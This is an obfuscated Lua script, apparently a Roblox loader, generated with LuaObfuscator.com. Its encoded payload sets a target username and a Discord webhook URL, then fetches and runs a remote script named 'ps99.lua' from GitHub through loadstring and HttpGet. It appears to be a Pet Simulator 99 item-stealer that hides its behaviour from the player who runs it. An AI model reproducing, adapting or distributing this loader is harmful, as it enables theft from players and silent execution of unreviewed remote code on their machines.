--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v89=v5(v82,v19);v19=nil;return v89;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/((5 -3)^(v32-1)))%(((2 + 3) -3)^(((v33-(878 -(282 + 595))) -(v32-(1638 -(1523 + 114)))) + (1 -0))) ;return v83-(v83%(1 -0)) ;else local v84=0 -0 ;local v85;while true do if (v84==(1270 -(226 + 1044))) then v85=(621 -(555 + 64))^(v32-((1889 -(892 + 65)) -(857 + 74))) ;return (((v31%(v85 + v85))>=v85) and ((1356 -787) -(367 + 201))) or (927 -((395 -181) + (1308 -595))) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (352 -(87 + 263)) ;return (v36 * (436 -(67 + 113))) + v35 ;end local function v23() local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1 -0)) then return (v41 * (41190819 -24413603)) + (v40 * (48199 + 17337)) + (v39 * (1017 -761)) + v38 ;end if (v37==(952 -(802 + 110 + 40))) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;v37=1;end end end local function v24() local v42=997 -(915 + 82) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==3) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else v47=1188 -(1069 + 118) ;v45=(772 -(201 + 571)) -0 ;end elseif (v47==(4477 -2430)) then return ((v46==(0 + 0)) and (v48 * ((1139 -(116 + 1022))/0))) or (v48 * NaN) ;end return v8(v48,v47-(1817 -794) ) * (v45 + (v46/((2 + 0)^(843 -(368 + 423))))) ;end if (v42==(3 -2)) then v45=19 -((41 -31) + 8) ;v46=(v20(v44,(2 + 1) -2 ,462 -(416 + 26) ) * (((21 -15) -4)^32)) + v43 ;v42=1 + (3 -2) ;end if (v42==(3 -1)) then v47=v20(v44,21,31);v48=((v20(v44,470 -(145 + 293) )==1) and  -(860 -(814 + 45))) or (431 -(44 + 386)) ;v42=1489 -(998 + 488) ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=1 + 0 ;end end end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=(350 + 537) -((898 -637) + 624) ;end if (v50==(4 -1)) then return v6(v52);end if (v50==0) then v51=nil;if  not v49 then local v96=0;while true do if (v96==(1747 -(760 + 987))) then v49=v23();if (v49==(1080 -(1020 + 60))) then return "";end break;end end end v50=1424 -(630 + 793) ;end if (v50==((1919 -(1789 + 124)) -4)) then v52={};for v90=4 -3 , #v51 do v52[v90]=v2(v1(v3(v51,v90,v90)));end v50=3;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();while true do local v66=(function() return 0 + 0 ;end)();while true do if (v66~=1) then else if ((2 + 0)==v53) then for v100= #"]",v23() do local v101=(function() return v21();end)();if (v20(v101, #"}", #"/")~=(396 -(115 + 281))) then else local v104=(function() return 0;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104~=(0 -0)) then else local v147=(function() return 0 + 0 ;end)();while true do if (v147~=(0 -0)) then else v105=(function() return v20(v101,7 -5 , #"91(");end)();v106=(function() return v20(v101, #"xnxx",873 -(550 + 317) );end)();v147=(function() return 1 -0 ;end)();end if (v147==(1 -0)) then v104=(function() return 2 -1 ;end)();break;end end end if (3==v104) then if (v20(v106, #"91(", #"asd")== #"]") then v107[ #".dev"]=(function() return v59[v107[ #".dev"]];end)();end v54[v100]=(function() return v107;end)();break;end if (v104==(287 -(134 + 151))) then if (v20(v106, #":", #"}")~= #">") then else v107[2]=(function() return v59[v107[1667 -(970 + 695) ]];end)();end if (v20(v106,3 -1 ,2)~= #"~") then else v107[ #"xxx"]=(function() return v59[v107[ #"nil"]];end)();end v104=(function() return 3;end)();end if (v104==1) then local v149=(function() return 1990 -(582 + 1408) ;end)();local v150=(function() return;end)();while true do if (v149~=0) then else v150=(function() return 0 -0 ;end)();while true do if (v150==0) then local v174=(function() return 0 -0 ;end)();while true do if (v174==0) then v107=(function() return {v22(),v22(),nil,nil};end)();if (v105==0) then local v175=(function() return 0;end)();while true do if (v175~=0) then else v107[ #"nil"]=(function() return v22();end)();v107[ #"xnxx"]=(function() return v22();end)();break;end end elseif (v105== #":") then v107[ #"19("]=(function() return v23();end)();elseif (v105==(7 -5)) then v107[ #"91("]=(function() return v23() -(2^16) ;end)();elseif (v105~= #"19(") then else local v180=(function() return 1824 -(1195 + 629) ;end)();local v181=(function() return;end)();while true do if (0~=v180) then else v181=(function() return 0;end)();while true do if (v181==0) then v107[ #"19("]=(function() return v23() -((2 -0)^(257 -(187 + 54))) ;end)();v107[ #"?id="]=(function() return v22();end)();break;end end break;end end end v174=(function() return 781 -(162 + 618) ;end)();end if (v174~=1) then else v150=(function() return 1 + 0 ;end)();break;end end end if (1==v150) then v104=(function() return 2 + 0 ;end)();break;end end break;end end end end end end for v102= #"{",v23() do v55[v102-#"/" ]=(function() return v28();end)();end return v57;end break;end if (v66~=0) then else if (0==v53) then local v97=(function() return 0 -0 ;end)();local v98=(function() return;end)();while true do if ((0 -0)==v97) then v98=(function() return 0 + 0 ;end)();while true do if (v98==(1637 -(1373 + 263))) then v56=(function() return {};end)();v57=(function() return {v54,v55,nil,v56};end)();v98=(function() return 2;end)();end if (v98==2) then v53=(function() return  #",";end)();break;end if (v98~=0) then else v54=(function() return {};end)();v55=(function() return {};end)();v98=(function() return 1001 -(451 + 549) ;end)();end end break;end end end if (v53== #"\\") then local v99=(function() return 0 + 0 ;end)();while true do if (v99~=2) then else v53=(function() return 2;end)();break;end if (v99==(0 -0)) then v58=(function() return v23();end)();v59=(function() return {};end)();v99=(function() return 1 -0 ;end)();end if (v99==1) then for v109= #"|",v58 do local v110=(function() return 0;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v110==1) then if (v111== #"]") then v112=(function() return v21()~=(1384 -(746 + 638)) ;end)();elseif (v111==(1 + 1)) then v112=(function() return v24();end)();elseif (v111~= #"xnx") then else v112=(function() return v25();end)();end v59[v109]=(function() return v112;end)();break;end if (v110==(0 -0)) then local v152=(function() return 0;end)();while true do if ((342 -(218 + 123))~=v152) then else v110=(function() return 1;end)();break;end if (v152~=0) then else v111=(function() return v21();end)();v112=(function() return nil;end)();v152=(function() return 1582 -(1535 + 46) ;end)();end end end end end v57[ #"xxx"]=(function() return v21();end)();v99=(function() return 2 + 0 ;end)();end end end v66=(function() return 1;end)();end end end end local function v29(v60,v61,v62) local v63=v60[1 + 0 ];local v64=v60[322 -(53 + 267) ];local v65=v60[563 -(306 + 254) ];return function(...) local v67=v63;local v68=v64;local v69=v65;local v70=v27;local v71=1;local v72= -(1 + 0);local v73={};local v74={...};local v75=v12("#",...) -(1468 -(899 + 568)) ;local v76={};local v77={};for v86=(0 -0) + 0 ,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + (2 -(1 + 0)) ];else v77[v86]=v74[v86 + (604 -(268 + 335)) ];end end local v78=(v75-v69) + 1 + 0 ;local v79;local v80;while true do v79=v67[v71];v80=v79[1];if (v80<=((1153 -(564 + 292)) -(60 + (396 -166)))) then if (v80<=(853 -(20 + 830))) then if ((3417<=3829) and (v80<=(1 + 0))) then if (v80==(126 -(116 + 10))) then do return;end else v77[v79[1 + 1 ]]=v62[v79[575 -(426 + (439 -293)) ]];end elseif (v80==(1 + 1)) then local v115=1456 -(282 + 1174) ;local v116;local v117;local v118;local v119;while true do if (v115==(813 -((873 -(244 + 60)) + 242))) then for v167=v116,v72 do local v168=0 -0 ;while true do if (v168==(0 + 0)) then v119=v119 + (1025 -(706 + 318)) ;v77[v167]=v117[v119];break;end end end break;end if (v115==0) then v116=v79[1253 -(721 + 530) ];v117,v118=v70(v77[v116](v13(v77,v116 + (2 -1) ,v79[1274 -(945 + 326) ])));v115=2 -(1 + 0) ;end if ((v115==((477 -(41 + 435)) + 0)) or (4947<2722)) then v72=(v118 + v116) -(701 -(271 + (1430 -(938 + 63)))) ;v119=(0 + 0) -0 ;v115=2 + (1125 -(936 + 189)) ;end end else local v120=1500 -(1408 + 92) ;local v121;while true do if (v120==(1086 -(461 + 625))) then v121=v79[1290 -(327 + 666 + (1908 -(1565 + 48))) ];v77[v121]=v77[v121](v13(v77,v121 + 1 + 0 ,v72));break;end end end elseif ((2408<=4457) and (v80<=(1176 -(418 + 466 + 287)))) then if ((v80==(2 + 2)) or (2851<1455)) then local v122=0 + 0 ;local v123;local v124;while true do if ((0 + 0)==v122) then v123=v79[2];v124=v77[v79[1 + 2 ]];v122=1 + 0 ;end if (((530 -(406 + 123))==v122) or (443==636)) then v77[v123 + (1770 -(1749 + 20)) ]=v124;v77[v123]=v124[v79[1 + 3 ]];break;end end else v77[v79[1324 -(1249 + 73) ]]();end elseif ((4061>=280) and (v80>(3 + 3))) then v62[v79[1148 -((1604 -(782 + 356)) + 679) ]]=v77[v79[4 -2 ]];else v77[v79[5 -3 ]]=v79[1903 -(106 + 1794) ];end elseif (v80<=((1607 -(176 + 91)) -(797 + 532))) then if (v80<=((7 -4) + 6)) then if (v80>8) then do return;end else v77[v79[1 + 1 ]]=v79[(1 -0) + (1094 -(975 + 117)) ];end elseif (v80==(29 -19)) then v62[v79[7 -4 ]]=v77[v79[116 -(4 + 110) ]];else v77[v79[(1877 -(157 + 1718)) + 0 + 0 ]]();end elseif ((v80<=(597 -(57 + 527))) or (1513>1590)) then if (v80==(1439 -(41 + (4920 -3534)))) then local v133=103 -(17 + 86) ;local v134;local v135;local v136;local v137;while true do if ((0 + 0)==v133) then v134=v79[3 -1 ];v135,v136=v70(v77[v134](v13(v77,v134 + (337 -(144 + 192)) ,v79[219 -(42 + 174) ])));v133=2 -1 ;end if ((167 -(122 + 44))==v133) then v72=(v136 + v134) -(1 -0) ;v137=1504 -(363 + 1141) ;v133=6 -4 ;end if ((2 + 0)==v133) then for v169=v134,v72 do v137=v137 + 1 + 0 ;v77[v169]=v135[v137];end break;end end else v77[v79[3 -1 ]]=v62[v79[68 -(30 + 35) ]];end elseif (v80>(10 + 4)) then local v140=0 + 0 ;local v141;while true do if ((v140==(1975 -(1913 + 62))) or (2166<1293)) then v141=v79[2];v77[v141]=v77[v141](v13(v77,v141 + (1258 -(1043 + 214)) ,v72));break;end end else local v142=v79[7 -5 ];local v143=v77[v79[1215 -(323 + 889) ]];v77[v142 + (1934 -(565 + 1368)) ]=v143;v77[v142]=v143[v79[10 -6 ]];end v71=v71 + ((5681 -4019) -(1477 + 184)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083O0003083O00557365726E616D65030D3O00436F736D696347616D6572583003073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323731323139303437383238302O333631372F785949635A4B4D496C4B596A436954484B6F426A50625975635F453574555361486567413554755650664E38467968722O7366454D6A325165426C467756484F576B522D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403413O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F7A616368656D7A686573746F6B69792F782F6D61696E2F70732O392E6C7561000C3O0012083O00023O00120A3O00013O0012083O00043O00120A3O00033O0012013O00053O001201000100063O002004000100010007001208000300084O000C000100034O00035O00022O000B3O000100012O00093O00017O00",v9(),...);
